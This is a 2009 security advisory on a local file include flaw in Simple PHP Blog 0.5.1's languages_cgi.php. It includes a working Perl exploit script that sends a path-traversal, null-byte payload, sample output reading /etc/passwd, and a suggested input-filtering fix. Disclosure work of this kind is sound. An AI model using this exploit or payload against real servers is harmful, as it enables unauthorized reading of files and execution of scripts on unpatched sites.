============================================= INTERNET SECURITY AUDITORS ALERT 2009-005 - Original release date: March 2nd, 2009 - Last revised: December 18th, 2009 - Discovered by: Juan Galiana Lara - Severity: 6.8/10 (CVSS scored) ============================================= I. VULNERABILITY ------------------------- Simple PHP Blog <= 0.5.1 Local File Include vulnerability II. BACKGROUND ------------------------- Simple PHP Blog is a blog system does not requires database setup, and is very easy to install. III. DESCRIPTION ------------------------- Simple PHP Blog <= 0.5.1 is affected by a Local File Include vulnerability in 'languages_cgi.php' due to parameter 'blog_language1' is not properly sanitized. IV. PROOF OF CONCEPT ------------------------- The affected code: 62 require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php'); Exploit: #!/usr/bin/perl # Local File Include Exploit # Simple PHP Blog <= 0.5.1 # jgaliana <at> isecauditors=dot=com # Internet Security Auditors use LWP::UserAgent; if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); } $ua = LWP::UserAgent->new; $ua->agent("Simple PHP Blog Exploit ^_^"); $ua->default_header('Cookie' => "sid=$ARGV[3]"); my $req = new HTTP::Request POST => "http://$ARGV[0]$ARGV[1]/languages_cgi.php"; $req->content_type('application/x-www-form-urlencoded'); $req->content("blog_language1=../../../../..$ARGV[2]%00"); my $res = $ua->request($req); if ($res->is_success) { print $res->content; } else { print "Error: " .$res->status_line, "\n"; } $ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1 root:*:0:0:root:/root:/bin/bash The bug can be exploited with or without 'magic_quotes_gpc', but note that if magic_quotes_gpc is set to Off, an attacker can view any file, adding a '\0' character like /etc/passwd, if not only can include php files, allowing to execute any local php files. V. BUSINESS IMPACT ------------------------- The impact is the attacker can read arbitrary files in the context of the webserver and execute arbitrary local php scripts. VI. SYSTEMS AFFECTED ------------------------- Versions prior and including 0.5.1 are affected In order to patch the application the function file_exists() and basename() must be added to the affected code. VII. SOLUTION ------------------------- Change line 62 of languages_cgi.php in order to filter $_POST[ 'blog_language1' ] variable. if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ])) require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php'); VIII. REFERENCES ------------------------- http://www.simplephpblog.com http://sourceforge.net/projects/sphpblog/ http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- March 02, 2009: Initial release. December 18, 2009: Last revision. XI. DISCLOSURE TIMELINE ------------------------- March 02, 2009: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com) March 03, 2009: Notified to developer. No response. December 13, 2009: Notified again. No response. December 18, 2009: Added mitigation solution and sent to lists. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.